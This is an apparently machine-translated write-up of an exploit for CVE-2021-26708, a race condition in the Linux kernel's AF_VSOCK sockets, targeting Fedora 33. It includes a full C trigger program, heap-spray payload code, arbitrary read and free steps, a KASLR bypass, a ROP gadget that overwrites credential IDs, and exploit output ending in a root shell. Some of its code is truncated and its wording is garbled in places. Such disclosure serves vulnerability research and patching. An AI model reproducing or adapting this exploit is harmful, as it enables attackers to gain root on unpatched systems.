vsock_stream_connect() contains a socket lock, and vsock_stream_setsockopt() in the parallel thread also tries to obtain it, which constitutes a conditional competition. Therefore, when the second connect() is performed with a different svm_cid, the vsock_deassign_transport() function is called. This function executes virtio_transport_destruct(), releases vsock_sock.trans, and vsk->transport is set to NULL. When vsock_stream_connect() releases the socket lock, vsock_stream_setsockopt() can continue to execute. It calls vsock_update_buffer_size(), and then calls transport->notify_buffer_size(). Here transport contains an outdated value from a local variable, which does not match vsk->transport (the original value is set to NULL).
When the kernel executes virtio_transport_notify_buffer_size(), memory corruption occurs:
void virtio_transport_notify_buffer_size(struct vsock_sock *vsk, u64 *val)
{
struct virtio_vsock_sock *vvs = vsk->trans;
if (*val > VIRTIO_VSOCK_MAX_BUF_SIZE)
*val = VIRTIO_VSOCK_MAX_BUF_SIZE;
vvs->buf_alloc = *val;
virtio_transport_send_credit_update(vsk, VIRTIO_VSOCK_TYPE_STREAM, NULL);
}
virtio_transport_destruct(). The size of struct virtio_vsock_sock is 64 bytes and is located in the kmalloc-64 block cache. The buf_alloc field type is u32 and is located at offset 40. VIRTIO_VSOCK_MAX_BUF_SIZE is 0xFFFFFFFFUL. The value of *val is controlled by the attacker, and its four least important bytes are written into the freed memory.
==Fuzzing==
The syzkaller fuzzer has no way to reproduce this crash, so I decided to study it myself. But why does the fuzzer fail? Observe vsock_update_buffer_size() and find out:
if (val != vsk->buffer_size &&
transport && transport->notify_buffer_size)
transport->notify_buffer_size(vsk, &val);
vsk->buffer_size = val;
Only when val is different from the current buffer_size, will notify_buffer_size() be called, that is to say, when setsockopt() executes SO_VM_SOCKETS_BUFFER_SIZE, every time The size parameters of the call should all be different. So I built the relevant code:
/* * AF_VSOCK vulnerability trigger. * It's a PoC just for fun. * Author: Alexander Popov. */ #include #include #include #include #include #include #define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0) #define MAX_RACE_LAG_USEC 50 int vsock = -1; int tfail = 0; pthread_barrier_t barrier; int thread_sync(long lag_nsec) { int ret = -1; struct timespec ts0; struct timespec ts; long delta_nsec = 0; ret = pthread_barrier_wait(&barrier); if (ret != 0 && ret != PTHREAD_BARRIER_SERIAL_THREAD) { perror("[-] pthread_barrier_wait"); return EXIT_FAILURE; } ret = clock_gettime(CLOCK_MONOTONIC, &ts0); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } while (delta_nsec < lag_nsec) { ret = clock_gettime(CLOCK_MONOTONIC, &ts); if (ret != 0) { perror("[-] clock_gettime"); return EXIT_FAILURE; } delta_nsec = (ts.tv_sec - ts0.tv_sec) * 1000000000 + ts.tv_nsec - ts0.tv_nsec; } return EXIT_SUCCESS; } void *th_connect(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct sockaddr_vm addr = { .svm_family = AF_VSOCK, }; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } addr.svm_cid = VMADDR_CID_LOCAL; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); addr.svm_cid = VMADDR_CID_HYPERVISOR; connect(vsock, (struct sockaddr *)&addr, sizeof(struct sockaddr_vm)); return NULL; } void *th_setsockopt(void *arg) { int ret = -1; long lag_nsec = *((long *)arg) * 1000; struct timespec tp; unsigned long size = 0; ret = thread_sync(lag_nsec); if (ret != EXIT_SUCCESS) { tfail++; return NULL; } clock_gettime(CLOCK_MONOTONIC, &tp); size = tp.tv_nsec; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_SIZE, &size, sizeof(unsigned long)); return NULL; } int main(void) { int ret = -1; unsigned long size = 0; long loop = 0; pthread_t th[2] = { 0 }; vsock = socket(AF_VSOCK, SOCK_STREAM, 0); if (vsock == -1) err_exit("[-] open vsock"); printf("[+] AF_VSOCK socket is opened\n"); size = 1; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MIN_SIZE, &size, sizeof(unsigned long)); size = 0xfffffffffffffffdlu; setsockopt(vsock, PF_VSOCK, SO_VM_SOCKETS_BUFFER_MAX_SIZE, &size, sizeof(unsigned long)); ret = pthread_barrier_init(&barrier, NULL, 2); if (ret != 0) err_exit("[-] pthread_barrier_init"); for (loop = 0; loop < 30000; loop++) { long tmo1 = 0; long tmo2 = loop % MAX_RACE_LAG_USEC; printf("race loop %ld: tmo1 %ld, tmo2 %ld\n", loop, tmo1, tmo2); ret = pthread_create(&th[0], NULL, th_connect, &tmo1); if (ret != 0) err_exit("[-] pthread_create #0"); ret = pthread_create(&th[1], NULL, th_setsockopt, &tmo2); if (ret != 0) err_exit("[-] pthread_create #1"); ret = pthread_join(th[0], NULL); if (ret != 0) err_exit("[-] pthread_join #0"); ret = pthread_join(th[1], NULL); if (ret != 0) err_exit("[-] pthread_join #1"); if (tfail) { printf("[-] some thread got troubles\n"); exit(EXIT_FAILURE); } } ret = close(vsock); if (ret) perror("[-] close"); printf("[+] now see your warnings in the kernel log\n"); return 0; }
The size value here is taken from the number of nanoseconds returned by clock_gettime(), which may be different each time. The original syzkaller will not do this, because when syzkaller generates fuzzing input, the value of the syscall parameter is determined and will not change during execution.
== The power of four bytes ==
Here I choose Fedora 33 Server as the research target, the kernel version is 5.10.11-200.fc33.x86_64, and I am determined to bypass SMEP and SMAP.
In the first step, I started to study stable heap spraying, which exploited the execution of user space activities to cause the kernel to allocate another 64-byte object at the location of the released virtio_vsock_sock. After several experimental attempts, it was confirmed that the released virtio_vsock_sock was overwritten, indicating that heap spraying is feasible. Finally I found msgsnd() syscall. It creates struct msg_msg in the kernel space, see pahole output:
struct msg_msg {
struct list_head m_list; /* 0 16 */
long int m_type; /* 16 8 */
size_t m_ts; /* 24 8 */
struct msg_msgseg * next; /* 32 8 */
void * security; /* 40 8 */
/* size: 48, cachelines: 1, members: 5 */
/* last cacheline: 48 bytes */
};
The front is the message header, and the back is the message data. If the struct msgbuf in the user space has a 16-byte mtext, the corresponding msg_msg will be created in the kmalloc-64 block cache. A 4-byte write-after-free will destroy the void *security pointer at offset 40. The msg_msg.security field points to the kernel data allocated by lsm_msg_msg_alloc(). When msg_msg is received, it will be released by security_msg_msg_free(). Therefore, by destroying the first half of the security pointer, arbitrary free can be obtained.
==Kernel Information Leak==
Here is used [https://www.pwnwiki.org/index.php?title=CVE-2019-18683_Linux_kernel_through_5.3.8_%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D %87%E6%BC%8F%E6%B4%9E CVE-2019-18683] the same technique. The second connect() of the virtual socket calls vsock_deassign_transport() and sets vsk->transport to NULL, making vsock_stream_setsockopt() Calling virtio_transport_send_pkt_info() after the memory crash, a kernel warning appears:
WARNING: CPU: 1 PID: 6739 at net/vmw_vsock/virtio_transport_common.c:34 ... CPU: 1 PID: 6739 Comm: racer Tainted: G W 5.10.11-200.fc33.x86_64 #1 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.13.0-2.fc32 04/01/2014 RIP: 0010:virtio_transport_send_pkt_info+0x14d/0x180 [vmw_vsock_virtio_transport_common] ... RSP: 0018:ffffc90000d07e10 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888103416ac0 RCX: ffff88811e845b80 RDX: 00000000ffffffff RSI: ffffc90000d07e58 RDI: ffff888103416ac0 RBP: 0000000000000000 R08: 00000000052008af R09: 0000000000000000 R10: 0000000000000126 R11: 0000000000000000 R12: 0000000000000008 R13: ffffc90000d07e58 R14: 0000000000000000 R15: ffff888103416ac0 FS: 00007f2f123d5640(0000) GS:ffff88817bd00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f81ffc2a000 CR3: 000000011db96004 CR4: 0000000000370ee0 Call Trace: virtio_transport_notify_buffer_size+0x60/0x70 [vmw_vsock_virtio_transport_common] vsock_update_buffer_size+0x5f/0x70 [vsock] vsock_stream_setsockopt+0x128/0x270 [vsock] ...
Through gdb debugging, it is found that the RCX register contains the kernel address of the released virtio_vsock_sock, and the RBX register contains the kernel address of vsock_sock.
==Achieve arbitrary reading==
===From arbitrary free to use-after-free===
Release an object from the leaked kernel address
Perform heap spray and cover the object with controlled data
Use damaged objects for privilege escalation
The System V message implemented by the kernel has a maximum limit of DATALEN_MSG, that is, PAGE_SIZE minus sizeof(struct msg_msg)). If you send a larger message, the remaining messages will be saved in the list of message segments. The msg_msg contains struct msg_msgseg *next to point to the first segment, and size_t m_ts is used to store the size. When performing an overwrite operation, you can put the controlled value in msg_msg.m_ts and msg_msg.next:

Payload:
#define PAYLOAD_SZ 40
void adapt_xattr_vs_sysv_msg_spray(unsigned long kaddr)
{
struct msg_msg *msg_ptr;
xattr_addr = spray_data + PAGE_SIZE * 4 - PAYLOAD_SZ;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0xa5, PAGE_SIZE * 4);
printf("[+] adapt the msg_msg spraying payload:\n");
msg_ptr = (struct msg_msg *)xattr_addr;
msg_ptr->m_type = 0x1337;
msg_ptr->m_ts = ARB_READ_SZ;
msg_ptr->next = (struct msg_msgseg *)kaddr; /* set the segment ptr for arbitrary read */
printf("\tmsg_ptr %p\n\tm_type %lx at %p\n\tm_ts %zu at %p\n\tmsgseg next %p at %p\n",
msg_ptr,
msg_ptr->m_type, &(msg_ptr->m_type),
msg_ptr->m_ts, &(msg_ptr->m_ts),
msg_ptr->next, &(msg_ptr->next));
}
But how to use msg_msg to read kernel data? By reading the msgrcv() system call documentation, I found a good solution, using msgrcv() and MSG flags:
MSG_COPY (since Linux 3.8)
Nondestructively fetch a copy of the message at the ordinal position in the queue
specified by msgtyp (messages are considered to be numbered starting at 0).
This flag causes the kernel to copy the message data to the user space without deleting it from the message queue. If the kernel has CONFIG_CHECKPOINT_RESTORE=y, then MSG is available and applicable in Fedora Server.
===Steps of arbitrary reading===
Ready to work:
Use sched_getaffinity() and CPU_COUNT() to calculate the number of available CPUs (at least two are required for this vulnerability);
Open /dev/kmsg for analysis;
mmap() configures userfaultfd() in the spray_data memory area as the last part;
Start a separate pthread to handle userfaultfd() events;
Start 127 threads for setxattr()&userfaultfd() heap spray on msg_msg, and hang them on thread_barrier;
Get the kernel address of the original msg_msg:
Conditional competition on virtual sockets;
After the second connect(), wait 35 microseconds in the busy loop;
Call msgsnd() to create a separate message queue; after memory corruption, the msg_msg object is placed in the virtio_vsock_sock position;
Parse the kernel log and save the kernel address of msg_msg from the kernel warning (RCX register);
At the same time, save the kernel address of vsock_sock from the RBX register;
Use the damaged msg_msg to perform arbitrary release of the original msg_msg:
Use 4 bytes of the original msg_msg address as SO_VM_SOCKETS_BUFFER_SIZE to achieve memory corruption;
Conditional competition on virtual sockets;
Call msgsnd() immediately after the second connect(); msg_msg is placed in the position of virtio_vsock_sock to achieve destruction;
The security pointer of the now destroyed msg_msg stores the address of the original msg_msg (from step 2);

If the msg_msg.security memory corruption from the setsockopt() thread occurs during the processing of msgsnd(), the SELinux permission check fails;
In this case, msgsnd() returns -1, and the damaged msg_msg is destroyed; releasing msg_msg.security can release the original msg_msg;
Overwrite the original msg_msg with a controllable payload:
After msgsnd() fails, the vulnerability will call pthread_barrier_wait() and call 127 pthreads for heap spraying;
These pthreads execute the payload of setxattr();
The original msg_msg is overwritten by controllable data, and the msg_msg.next pointer stores the address of the vsock_sock object;

Read the contents of the vsock_sock kernel object to user space by receiving messages from the message queue storing the overwritten msg_msg:
ret = msgrcv(msg_locations[0].msq_id, kmem, ARB_READ_SZ, 0,
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
==Find the target of attack==
Here are the points I found:
1. Dedicated block cache, such as PINGv6 and sock_inode_cache have many pointers to objects
2. The struct mem_cgroup *sk_memcg pointer is at offset 664 in vsock_sock.sk. The mem_cgroup structure is allocated in kmalloc-4k block cache.
3. The const struct cred *owner pointer is at offset 840 of vsock_sock.sk, and stores the address of the credential that can be overwritten for permission escalation.
4. The void (*sk_write_space)(struct sock *) function pointer is at offset 688 of vsock_sock.sk and is set to the address of the sock_def_write_space() kernel function. It can be used to calculate the KASLR offset.
Here is how the vulnerability extracts these pointers from memory:
#define SK_MEMCG_RD_LOCATION (DATALEN_MSG + SK_MEMCG_OFFSET)
#define OWNER_CRED_OFFSET 840
#define OWNER_CRED_RD_LOCATION (DATALEN_MSG + OWNER_CRED_OFFSET)
#define SK_WRITE_SPACE_OFFSET 688
#define SK_WRITE_SPACE_RD_LOCATION (DATALEN_MSG + SK_WRITE_SPACE_OFFSET)
/*
* From Linux kernel 5.10.11-200.fc33.x86_64:
* function pointer for calculating KASLR secret
*/
#define SOCK_DEF_WRITE_SPACE 0xffffffff819851b0lu
unsigned long sk_memcg = 0;
unsigned long owner_cred = 0;
unsigned long sock_def_write_space = 0;
unsigned long kaslr_offset = 0;
/* ... */
sk_memcg = kmem[SK_MEMCG_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sk_memcg %lx (offset %ld in the leaked kmem)\n",
sk_memcg, SK_MEMCG_RD_LOCATION);
owner_cred = kmem[OWNER_CRED_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found owner cred %lx (offset %ld in the leaked kmem)\n",
owner_cred, OWNER_CRED_RD_LOCATION);
sock_def_write_space = kmem[SK_WRITE_SPACE_RD_LOCATION / sizeof(uint64_t)];
printf("[+] Found sock_def_write_space %lx (offset %ld in the leaked kmem)\n",
sock_def_write_space, SK_WRITE_SPACE_RD_LOCATION);
kaslr_offset = sock_def_write_space - SOCK_DEF_WRITE_SPACE;
printf("[+] Calculated kaslr offset: %lx\n", kaslr_offset);
==Implement Use-after-free on sk_buff==
The network-related buffer in the Linux kernel is represented by struct sk_buff. There are skb_shared_info and destructor_arg in this object, which can be used for control flow hijacking. Network data and skb_shared_info are placed in the same kernel memory block pointed to by sk_buff.head. Therefore, creating a 2800-byte network packet in user space will cause skb_shared_info to be allocated to the kmalloc-4k block cache, as is the mem_cgroup object.
I built the following steps:
1. Use sockets (AF_INET, SOCK_DGRAM, IPPROTO_UDP) to create a client socket and 32 server sockets
2. Prepare a 2800-byte buffer in user space and use 0x42 to memset()
3. Use sendto() to send this buffer from the client socket to each server socket, which is used to create the sk_buff object in kmalloc-4k. Use `sched_setaffinity() on every available CPU
4. Perform arbitrary reading process on vsock_sock
5. Calculate the possible sk_buff kernel address as sk_memcg plus 4096 (the next element of kmalloc-4k)
6. Perform arbitrary reads on this possible sk_buff address
7. If you find 0x42424242424242lu in the location of the network data, find the real sk_buff, and go to step 8. Otherwise, add 4096 to the possible sk_buff address and go to step 6
8. Execute the setxattr()&userfaultfd() heap spray of 32 pthreads on sk_buff and hang them on pthread_barrier
9. Arbitrarily release the sk_buff kernel address
10. Call pthread_barrier_wait(), execute 32 setxattr() to cover the heap spray pthreads of skb_shared_info
11. Use recv() to receive network messages from the server socket.
==Writing freely through skb_shared_info==
The following is a valid payload that overwrites the sk_buff object:
#define SKB_SIZE 4096
#define SKB_SHINFO_OFFSET 3776
#define MY_UINFO_OFFSET 256
#define SKBTX_DEV_ZEROCOPY (1 << 3)
void prepare_xattr_vs_skb_spray(void)
{
struct skb_shared_info *info = NULL;
xattr_addr = spray_data + PAGE_SIZE * 4 - SKB_SIZE + 4;
/* Don't touch the second part to avoid breaking page fault delivery */
memset(spray_data, 0x0, PAGE_SIZE * 4);
info = (struct skb_shared_info *)(xattr_addr + SKB_SHINFO_OFFSET);
info->tx_flags = SKBTX_DEV_ZEROCOPY;
info->destructor_arg = uaf_write_value + MY_UINFO_OFFSET;
uinfo_p = (struct ubuf_info *)(xattr_addr + MY_UINFO_OFFSET);
skb_shared_info resides in the injection data, exactly at the offset SKB_SHINFO_OFFSET, which is 3776 bytes. The skb_shared_info.destructor_arg pointer stores the address of struct ubuf_info. Because the kernel address of the attacked sk_buff is known, a fake ubuf_info can be created at MY_UINFO_OFFSET in the network buffer. The following is the layout of a valid payload:

Let's talk about the destructor_arg callback:
/*
* A single ROP gadget for arbitrary write:
* mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rdx + rcx*8], rsi ; ret
* Here rdi stores uinfo_p address, rcx is 0, rsi is 1
*/
uinfo_p->callback = ARBITRARY_WRITE_GADGET + kaslr_offset;
uinfo_p->desc = owner_cred + CRED_EUID_EGID_OFFSET; /* value for "qword ptr [rdi + 8]" */
uinfo_p->desc = uinfo_p->desc - 1; /* rsi value 1 should not get into euid */
Since I couldn't find a gadget that can meet my needs in vmlinuz-5.10.11-200.fc33.x86_64, I researched and constructed it myself.
The callback function pointer stores the address of a ROP gadget, RDI stores the first parameter of the callback function, which is the address of ubuf_info itself, and RDI + 8 points to ubuf_info.desc. gadget moves ubuf_info.desc to RDX. Now RDX contains the effective user ID and group ID address minus one byte. This byte is very important: when the gadget writes message 1 from RSI to the memory pointed to by RDX, the effective uid and gid will be overwritten with zero. Repeat the same process until the privileges are upgraded to root. The output flow of the whole process is as follows:
[a13x@localhost ~]$ ./vsock_pwn
=================================================
==== CVE-2021-26708 PoC exploit by a13xp0p0v ====
=================================================
[+] begin as: uid=1000, euid=1000
[+] we have 2 CPUs for racing
[+] getting ready...
[+] remove old files for ftok()
[+] spray_data at 0x7f0d9111d000
[+] userfaultfd #1 is configured: start 0x7f0d91121000, len 0x1000
[+] fault_handler for uffd 38 is ready
[+] stage I: collect good msg_msg locations
[+] go racing, show wins:
save msg_msg ffff9125c25a4d00 in msq 11 in slot 0
save msg_msg ffff9125c25a4640 in msq 12 in slot 1
save msg_msg ffff9125c25a4780 in msq 22 in slot 2
save msg_msg ffff9125c3668a40 in msq 78 in slot 3
[+] stage II: arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4d00
kaddr for arb read: ffff9125c2035300
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c2035300 at 0x7f0d91120ff8
[+] go racing, show wins:
[+] stage III: arbitrary read vsock via good overwritten msg_msg (msq 11)
[+] msgrcv returned 6096 bytes
[+] Found sk_memcg ffff9125c42f9000 (offset 4712 in the leaked kmem)
[+] Found owner cred ffff9125c3fd6e40 (offset 4888 in the leaked kmem)
[+] Found sock_def_write_space ffffffffab9851b0 (offset 4736 in the leaked kmem)
[+] Calculated kaslr offset: 2a000000
[+] stage IV: search sprayed skb near sk_memcg...
[+] checking possible skb location: ffff9125c42fa000
[+] stage IV part I: repeat arbitrary free msg_msg using corrupted msg_msg
kaddr for arb free: ffff9125c25a4640
kaddr for arb read: ffff9125c42fa030
[+] adapt the msg_msg spraying payload:
msg_ptr 0x7f0d91120fd8
m_type 1337 at 0x7f0d91120fe8
m_ts 6096 at 0x7f0d91120ff0
msgseg next 0xffff9125c42fa030 at 0x7f0d91120ff8
[+] go racing, show wins: 0 0 20 15 42 11
[+] stage IV part II: arbitrary read skb via good overwritten msg_msg (msq 12)
[+] msgrcv returned 6096 bytes
[+] found a real skb
[+] stage V: try to do UAF on skb at ffff9125c42fa000
[+] skb payload:
start at 0x7f0d91120004
skb_shared_info at 0x7f0d91120ec4
tx_flags 0x8
destructor_arg 0xffff9125c42fa100
callback 0xffffffffab64f6d4
desc 0xffff9125c3fd6e53
[+] go racing, show wins: 15
[+] stage VI: repeat UAF on skb at ffff9125c42fa000
[+] go racing, show wins: 0 12 13 15 3 12 4 16 17 18 9 47 5 12 13 9 13 19 9 10 13 15 12 13 15 17 30
[+] finish as: uid=0, euid=0
[+] starting the root shell...
uid=0(root) gid=0(root) groups=0(root),1000(a13x) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
==Video==
==Reference==
https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html













请登录后查看评论内容